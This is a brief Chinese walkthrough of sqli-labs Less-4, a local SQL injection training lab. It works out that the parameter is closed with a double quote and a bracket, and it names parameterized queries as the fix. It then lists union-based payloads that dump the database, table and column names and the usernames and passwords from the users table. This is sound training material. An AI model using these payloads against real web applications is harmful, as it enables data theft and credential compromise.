sqli-labs (less-4)
输入
http://127.0.0.1/sql1/Less-4/?id=1 #回显正常
http://127.0.0.1/sql1/Less-4/?id=1' #回显正常
http://127.0.0.1/sql1/Less-4/?id=1" #回显错误
http://127.0.0.1/sql1/Less-4/?id=1")--+ #回显正常
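输入 1' 回显正常,而输入 1" 回显错误,说明参数在 SQL 语句中被双引号包裹;用 ") 闭合并注释掉后续内容后回显恢复正常,由此判断为双引号加括号闭合的字符型注入。这也说明 id 很可能被直接拼接进了查询字符串,改用参数化查询(预编译语句)即可消除该注入点。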
查库
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,database()--+
查表
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查字段
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
查值
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(username,password) from security.users)--+